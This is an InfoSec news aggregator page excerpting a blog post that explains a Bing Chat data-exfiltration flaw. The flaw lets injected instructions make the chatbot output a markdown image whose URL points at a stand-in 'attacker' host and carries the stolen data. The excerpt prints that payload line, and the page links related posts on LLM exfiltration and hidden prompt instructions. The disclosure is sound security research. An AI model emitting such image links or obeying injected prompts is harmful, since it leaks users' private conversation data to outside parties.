all InfoSec news
Bing Chat: Data Exfiltration Exploit Explained
June 18, 2023, 7:01 a.m. |
Embrace The Red embracethered.com
The Vulnerability - Image Markdown Injection When Bing Chat returns text it can return markdown elements, which the client will render as HTML. This includes the feature to include images.
Imagine the LLM returns the following text:
![data exfiltration in progress](https://attacker/q=[DATA_EXFILTRATION]) This will be rendered as an HTML image …
advertisement attack bing bing chat chat client data data exfiltration exfiltrate data exfiltration explained exploit html injection injection attack malicious prompt injection return text vulnerability
More from embracethered.com / Embrace The Red
Bobby Tables but with LLM Apps - Google NotebookML Data Exfiltration
2 weeks, 2 days ago |
embracethered.com
HackSpaceCon 2024: Short Trip Report, Slides and Rocket Launch
2 weeks, 4 days ago |
embracethered.com
ASCII Smuggler - Improvements
1 month, 3 weeks ago |
embracethered.com
ChatGPT: Lack of Isolation between Code Interpreter sessions of GPTs
2 months, 2 weeks ago |
embracethered.com
Video: ASCII Smuggling and Hidden Prompt Instructions
2 months, 2 weeks ago |
embracethered.com
Jobs in InfoSec / Cybersecurity
Social Engineer For Reverse Engineering Exploit Study
@ Independent study | Remote
Application Security Engineer - Remote Friendly
@ Unit21 | San Francisco,CA; New York City; Remote USA;
Cloud Security Specialist
@ AppsFlyer | Herzliya
Malware Analysis Engineer - Canberra, Australia
@ Apple | Canberra, Australian Capital Territory, Australia
Product CISO
@ Fortinet | Sunnyvale, CA, United States
Manager, Security Engineering
@ Thrive | United States - Remote